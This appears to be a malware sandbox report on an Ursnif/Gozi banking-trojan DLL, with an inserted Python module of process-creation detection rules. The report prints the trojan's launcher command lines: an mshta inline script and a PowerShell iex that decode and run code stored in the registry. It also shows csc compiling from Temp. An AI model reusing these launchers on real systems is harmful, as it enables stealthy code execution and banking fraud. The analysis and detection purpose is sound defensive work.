Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4016, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7164, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3472, type: MEMORY
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4288, type: MEMORY

E-Banking Fraud:

Detected Gozi e-Banking trojan
Source: C:\Windows\System32\loaddll32.exe Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff 0_2_028231EC
Source: C:\Windows\System32\loaddll32.exe Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ie 0_2_028231EC
Source: C:\Windows\System32\loaddll32.exe Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff 0_2_028231EC
Yara detected Ursnif
Disables SPDY (HTTP compression, likely to perform web injects)
Source: C:\Windows\explorer.exe Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

Writes or reads registry keys via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\System32\loaddll32.exe Memory allocated: 73CA0000 page execute and read and write Jump to behavior
Contains functionality to call native functions
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_73CA1CEF GetProcAddress,NtCreateSection,memset, 0_2_73CA1CEF
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_73CA1880 NtMapViewOfSection, 0_2_73CA1880
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_73CA15AB GetLastError,NtClose, 0_2_73CA15AB
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_73CA24C5 NtQueryVirtualMemory, 0_2_73CA24C5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0282620F GetProcAddress,NtCreateSection,memset, 0_2_0282620F
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02823A77 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 0_2_02823A77
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0282A3DE NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 0_2_0282A3DE
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02831813 NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 0_2_02831813
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02816825 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 0_2_02816825
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0281B868 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 0_2_0281B868
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0282865A NtQueryInformationProcess, 0_2_0282865A
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0281976D GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 0_2_0281976D
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0283345F NtMapViewOfSection, 0_2_0283345F
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02811D18 HeapFree,memcpy,memcpy,memcpy,NtUnmapViewOfSection,NtClose,memset, 0_2_02811D18
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0281C536 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 0_2_0281C536
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02832557 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 0_2_02832557
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02835A8E NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 0_2_02835A8E
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0282AAB7 NtGetContextThread,RtlNtStatusToDosError, 0_2_0282AAB7
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02820084 memset,NtQueryInformationProcess, 0_2_02820084
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02816F11 NtQuerySystemInformation,RtlNtStatusToDosError, 0_2_02816F11
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02814C96 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 0_2_02814C96
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02818DAA NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 0_2_02818DAA
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02827511 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 0_2_02827511
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02812D26 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 0_2_02812D26
Source: C:\Windows\System32\control.exe Code function: 26_2_001E3830 NtWriteVirtualMemory, 26_2_001E3830
Source: C:\Windows\System32\control.exe Code function: 26_2_001E387C NtCreateSection, 26_2_001E387C
Source: C:\Windows\System32\control.exe Code function: 26_2_001DBAB4 NtAllocateVirtualMemory, 26_2_001DBAB4
Source: C:\Windows\System32\control.exe Code function: 26_2_001E1AC4 NtQueryInformationProcess, 26_2_001E1AC4
Source: C:\Windows\System32\control.exe Code function: 26_2_001DCCA0 NtReadVirtualMemory, 26_2_001DCCA0
Source: C:\Windows\System32\control.exe Code function: 26_2_001EF560 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification, 26_2_001EF560
Source: C:\Windows\System32\control.exe Code function: 26_2_001FADD4 NtQueryInformationProcess, 26_2_001FADD4
Source: C:\Windows\System32\control.exe Code function: 26_2_001F676C RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose, 26_2_001F676C
Source: C:\Windows\System32\control.exe Code function: 26_2_001EFFCC NtMapViewOfSection, 26_2_001EFFCC
Source: C:\Windows\System32\control.exe Code function: 26_2_001FF7EC NtQueryInformationToken,NtQueryInformationToken,NtClose, 26_2_001FF7EC
Source: C:\Windows\System32\control.exe Code function: 26_2_00211004 NtProtectVirtualMemory,NtProtectVirtualMemory, 26_2_00211004
Source: C:\Windows\explorer.exe Code function: 29_2_03B5BAB4 NtAllocateVirtualMemory, 29_2_03B5BAB4
Source: C:\Windows\explorer.exe Code function: 29_2_03B61AC4 NtQueryInformationProcess, 29_2_03B61AC4
Source: C:\Windows\explorer.exe Code function: 29_2_03B63830 NtWriteVirtualMemory, 29_2_03B63830
Source: C:\Windows\explorer.exe Code function: 29_2_03B6387C NtCreateSection, 29_2_03B6387C
Source: C:\Windows\explorer.exe Code function: 29_2_03B7F7EC NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose, 29_2_03B7F7EC
Source: C:\Windows\explorer.exe Code function: 29_2_03B6FFCC NtMapViewOfSection, 29_2_03B6FFCC
Source: C:\Windows\explorer.exe Code function: 29_2_03B7676C NtSetContextThread,NtUnmapViewOfSection,NtClose, 29_2_03B7676C
Source: C:\Windows\explorer.exe Code function: 29_2_03B6AD14 NtQuerySystemInformation, 29_2_03B6AD14
Source: C:\Windows\explorer.exe Code function: 29_2_03B6F560 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification, 29_2_03B6F560
Source: C:\Windows\explorer.exe Code function: 29_2_03B5CCA0 NtReadVirtualMemory, 29_2_03B5CCA0
Source: C:\Windows\explorer.exe Code function: 29_2_03B91004 NtProtectVirtualMemory,NtProtectVirtualMemory, 29_2_03B91004
Contains functionality to launch a process as a different user
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02812F65 CreateProcessAsUserW, 0_2_02812F65
Detected potential crypto function
Source: C:\Windows\explorer.exe Code function: 29_2_03B57320 29_2_03B57320
Source: C:\Windows\explorer.exe Code function: 29_2_03B58B5C 29_2_03B58B5C
Source: C:\Windows\explorer.exe Code function: 29_2_03B68B4C 29_2_03B68B4C
Source: C:\Windows\explorer.exe Code function: 29_2_03B78224 29_2_03B78224
Source: C:\Windows\explorer.exe Code function: 29_2_03B73208 29_2_03B73208
Source: C:\Windows\explorer.exe Code function: 29_2_03B61174 29_2_03B61174
Source: C:\Windows\explorer.exe Code function: 29_2_03B7F940 29_2_03B7F940
Source: C:\Windows\explorer.exe Code function: 29_2_03B7E080 29_2_03B7E080
Source: C:\Windows\explorer.exe Code function: 29_2_03B720F8 29_2_03B720F8
Source: C:\Windows\explorer.exe Code function: 29_2_03B5203C 29_2_03B5203C
Source: C:\Windows\explorer.exe Code function: 29_2_03B76064 29_2_03B76064
Source: C:\Windows\explorer.exe Code function: 29_2_03B6B040 29_2_03B6B040
Source: C:\Windows\explorer.exe Code function: 29_2_03B617B8 29_2_03B617B8
Source: C:\Windows\explorer.exe Code function: 29_2_03B59F98 29_2_03B59F98
Source: C:\Windows\explorer.exe Code function: 29_2_03B726B4 29_2_03B726B4
Source: C:\Windows\explorer.exe Code function: 29_2_03B7BEB0 29_2_03B7BEB0
Source: C:\Windows\explorer.exe Code function: 29_2_03B5AE04 29_2_03B5AE04
Source: C:\Windows\explorer.exe Code function: 29_2_03B6B520 29_2_03B6B520
Source: C:\Windows\explorer.exe Code function: 29_2_03B6452C 29_2_03B6452C
Source: C:\Windows\explorer.exe Code function: 29_2_03B7B516 29_2_03B7B516
Source: C:\Windows\explorer.exe Code function: 29_2_03B56D08 29_2_03B56D08
Source: C:\Windows\explorer.exe Code function: 29_2_03B69CB0 29_2_03B69CB0
Source: C:\Windows\explorer.exe Code function: 29_2_03B794B8 29_2_03B794B8
Source: C:\Windows\explorer.exe Code function: 29_2_03B6D4A8 29_2_03B6D4A8
Source: C:\Windows\explorer.exe Code function: 29_2_03B5BCF8 29_2_03B5BCF8
Source: C:\Windows\explorer.exe Code function: 29_2_03B63CE0 29_2_03B63CE0
Source: C:\Windows\explorer.exe Code function: 29_2_03B60CC0 29_2_03B60CC0
Source: C:\Windows\explorer.exe Code function: 29_2_03B774CC 29_2_03B774CC
Source: C:\Windows\explorer.exe Code function: 29_2_03B55474 29_2_03B55474
Source: C:\Windows\explorer.exe Code function: 29_2_03B5D460 29_2_03B5D460
PE file does not import any functions
Source: 3he3buld.dll.25.dr Static PE information: No import functions for PE file found
Source: l4vfe2li.dll.22.dr Static PE information: No import functions for PE file found
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Tries to load missing DLLs
Source: C:\Windows\System32\loaddll32.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\explorer.exe Section loaded: cryptdlg.dll
Source: C:\Windows\explorer.exe Section loaded: msoert2.dll
Source: classification engine Classification label: mal100.bank.troj.spyw.evad.winDLL@32/37@11/2
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02813861 CloseHandle,CloseHandle,CreateToolhelp32Snapshot,GetModuleHandleA,GetProcAddress,Thread32First,OpenThread,QueueUserAPC,CloseHandle,Thread32Next,CloseHandle, 0_2_02813861
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{E7B188DA-2B5F-11EB-90E5-ECF4BB570DC9}.dat
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4740:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{52C0E7AB-8963-5497-A3A6-CDC8873A517C}
Source: C:\Windows\System32\loaddll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{C2534899-3980-442C-D316-7DB8B7AA016C}
Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{CAC73C9B-A194-8CA5-7B9E-6580DFB269B4}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6168:120:WilError_01
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\~DFA6B98D9B8879D55E.TMP
Source: earmarkavchd.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Program Files\internet explorer\iexplore.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\nslookup.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: earmarkavchd.dll ReversingLabs: Detection: 45%
Source: loaddll32.exe String found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\earmarkavchd.dll'
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3884 CREDAT:17410 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3884 CREDAT:17416 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3884 CREDAT:82964 /prefetch:2
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\l4vfe2li\l4vfe2li.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES47A8.tmp' 'c:\Users\user\AppData\Local\Temp\l4vfe2li\CSC4DA260FDB3A0492587313FAF41D3B261.TMP'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\3he3buld\3he3buld.cmdline'
Source: unknown Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES5D63.tmp' 'c:\Users\user\AppData\Local\Temp\3he3buld\CSCBE830862A12C4DC4815ABE234EBA2CD.TMP'
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\6110.bi1'
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user\AppData\Local\Temp\6110.bi1'
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3884 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3884 CREDAT:17416 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3884 CREDAT:82964 /prefetch:2
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\l4vfe2li\l4vfe2li.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\3he3buld\3he3buld.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES47A8.tmp' 'c:\Users\user\AppData\Local\Temp\l4vfe2li\CSC4DA260FDB3A0492587313FAF41D3B261.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES5D63.tmp' 'c:\Users\user\AppData\Local\Temp\3he3buld\CSCBE830862A12C4DC4815ABE234EBA2CD.TMP'
Source: C:\Windows\System32\control.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\6110.bi1'
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user\AppData\Local\Temp\6110.bi1'
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
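The process tree above (mshta evaluating an inline HTA that reads its next stage from the registry, PowerShell decoding and invoking a value under HKCU\Software\AppDataLow, csc.exe compiling a source file from %TEMP%, and explorer.exe spawning cmd/nslookup against myip.opendns.com) maps onto a small set of process-creation rules. The Python below is an added example, not part of the Joe Sandbox report: the events are constructed to mirror the command lines above, PIDs that the report does not quote are invented, and the control.exe rule (a hidden `control.exe -h` launched by something other than explorer.exe) is this example's own heuristic, not a signature from the report.

```python
"""Process-creation rules for the Ursnif/Gozi chain seen in this report.

Added example, not part of the sandbox report. The events below are
constructed to mirror the report's command lines; PIDs not quoted in the
report are invented.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full image path of the new process
    cmdline: str    # its command line


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CSC = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"

# Constructed telemetry modelled on the report's process tree.
EVENTS = [
    ProcEvent(4396, 1234, r"C:\Windows\System32\loaddll32.exe",
              r"loaddll32.exe 'C:\Users\user\Desktop\earmarkavchd.dll'"),
    ProcEvent(6996, 4396, r"C:\Windows\System32\control.exe",
              r"C:\Windows\system32\control.exe -h"),
    ProcEvent(5100, 3472, r"C:\Windows\System32\mshta.exe",
              r"'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>"
              r"resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU"
              r"\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550"
              r"\\Actidsrv'));if(!window.flag)close()</script>'"),
    ProcEvent(7164, 5100, PS,
              r"powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software"
              r"\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))"),
    ProcEvent(7300, 7164, CSC,
              r"csc.exe /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\l4vfe2li\l4vfe2li.cmdline'"),
    ProcEvent(7400, 3472, r"C:\Windows\System32\cmd.exe",
              r"cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > "
              r"C:\Users\user\AppData\Local\Temp\6110.bi1'"),
    ProcEvent(7500, 7400, r"C:\Windows\System32\nslookup.exe",
              r"nslookup myip.opendns.com resolver1.opendns.com"),
    # Benign controls: an admin script and an ordinary build compile must not fire.
    ProcEvent(8000, 1234, PS, r"powershell.exe -File C:\scripts\backup.ps1"),
    ProcEvent(8100, 8000, CSC, r"csc.exe /noconfig @'C:\build\proj\obj\Debug\proj.cmdline'"),
]


def _name(image: str) -> str:
    return image.rsplit("\\", 1)[-1].lower()


def rule_mshta_inline_hta(e, parent):
    """mshta handed an inline about:<hta:...> document that pulls code from the registry."""
    c = e.cmdline.lower()
    return _name(e.image) == "mshta.exe" and "about:<hta:application>" in c and ".regread(" in c


def rule_powershell_iex_registry(e, parent):
    """PowerShell decoding and invoking a value stored under HKCU\\...\\AppDataLow."""
    c = e.cmdline
    return (_name(e.image) == "powershell.exe"
            and re.search(r"\b(iex|invoke-expression)\b", c, re.I) is not None
            and re.search(r"\b(gp|get-itemproperty)\b", c, re.I) is not None
            and "appdatalow" in c.lower())


def rule_mshta_spawns_shell(e, parent):
    return (parent is not None and _name(parent.image) == "mshta.exe"
            and _name(e.image) in {"powershell.exe", "cmd.exe"})


def rule_csc_source_in_temp(e, parent):
    return (_name(e.image) == "csc.exe"
            and re.search(r"\\appdata\\local\\temp\\", e.cmdline, re.I) is not None)


def rule_external_ip_lookup(e, parent):
    return _name(e.image) == "nslookup.exe" and "myip.opendns.com" in e.cmdline.lower()


def rule_control_hidden_from_loader(e, parent):
    """Heuristic of this example only: a hidden control.exe whose parent is not explorer.exe."""
    return (_name(e.image) == "control.exe"
            and re.search(r"control\.exe\s+-h\s*$", e.cmdline, re.I) is not None
            and parent is not None and _name(parent.image) != "explorer.exe")


RULES = [
    ("mshta_inline_hta_regread", rule_mshta_inline_hta),
    ("powershell_iex_from_registry", rule_powershell_iex_registry),
    ("mshta_spawning_shell", rule_mshta_spawns_shell),
    ("csc_source_in_temp", rule_csc_source_in_temp),
    ("external_ip_via_nslookup", rule_external_ip_lookup),
    ("control_exe_hidden_from_loader", rule_control_hidden_from_loader),
]


def detect(events):
    """Return (rule_name, pid) for every event that matches a rule."""
    by_pid = {e.pid: e for e in events}
    return [(name, e.pid) for e in events
            for name, pred in RULES if pred(e, by_pid.get(e.ppid))]


def lineage(events, pid):
    """Image names from `pid` up to the first ancestor not present in the events."""
    by_pid = {e.pid: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(_name(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule:32s} pid={pid} chain={' <- '.join(lineage(EVENTS, pid))}")
```

The rules deliberately key on the launcher's shape (inline HTA plus regread, iex of a decoded registry value, compiler fed from a per-user temp directory) rather than on the GUID-named key, which changes per build; the lineage helper is what lets the csc.exe hit be tied back to mshta.exe when triaging.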
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: C:\Windows\explorer.exe File opened: C:\Windows\SYSTEM32\msftedit.dll
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
